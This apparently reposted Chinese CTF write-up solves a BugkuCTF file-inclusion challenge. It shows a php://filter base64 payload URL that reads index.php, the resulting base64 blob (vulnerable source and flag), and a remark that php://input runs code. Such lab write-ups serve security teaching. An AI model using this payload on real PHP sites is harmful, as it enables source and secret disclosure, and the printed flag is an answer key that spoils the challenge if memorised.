BugkuCTF-WEB题文件包含
1.打開網頁,點擊click me? no鏈接
URL欄里顯示:http://114.67.246.176:15077/index.php?file=show.php,可能存在文件包含漏洞
這里介紹一下:php:// 協議
條件:
allow_url_fopen:off/on
allow_url_include :僅php://input php://stdin php://memory php://temp 需要on
作用:
php:// 訪問各個輸入/輸出流(I/O streams),在CTF里經常使用的是php://filter和php://input,php://filter用于讀取源碼,php://input用于執行php代碼。
2構造payload:
http://114.67.246.176:15077/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
77u/PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LXdlYjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2E2MTc3MDZiY2U0NWJkZGFhY2U5NmQ0NDYyYjhmODkxfQ0KPz4NCjwvaHRtbD4NCg==
相當于得到了源代碼進行base64編碼之后的結果,只需進行base64解碼即可獲取源代碼
得到flag。
總結
以上是生活随笔為你收集整理的BugkuCTF-WEB题文件包含的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: jq之$(“[href]“)
- 下一篇: Python变量 - Python零基础